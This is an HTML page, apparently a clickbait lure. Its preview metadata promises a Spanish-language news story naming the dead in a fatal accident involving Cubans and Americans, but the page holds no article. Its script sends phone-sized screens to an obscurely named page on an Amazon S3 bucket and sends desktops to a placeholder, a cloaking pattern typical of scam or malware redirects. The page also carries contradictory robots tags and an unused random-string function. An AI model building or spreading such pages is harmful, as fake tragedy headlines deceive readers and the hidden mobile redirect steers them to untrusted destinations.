<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Revelan las identidades de los fallecidos de este terrible accidente ocurrido esta mañana entre ellos hay cubanos y estadounidenses"/>
<meta property="og:image" content="https://storage.googleapis.com/bustling-brand-246016.appspot.com/caszdfaswDFEWQEWE/hgfdytyt56r46456546455.jpg"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://myxasuz0.s3.ap-northeast-2.amazonaws.com/Zmiocxs00/fdvvvvv221.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>
	
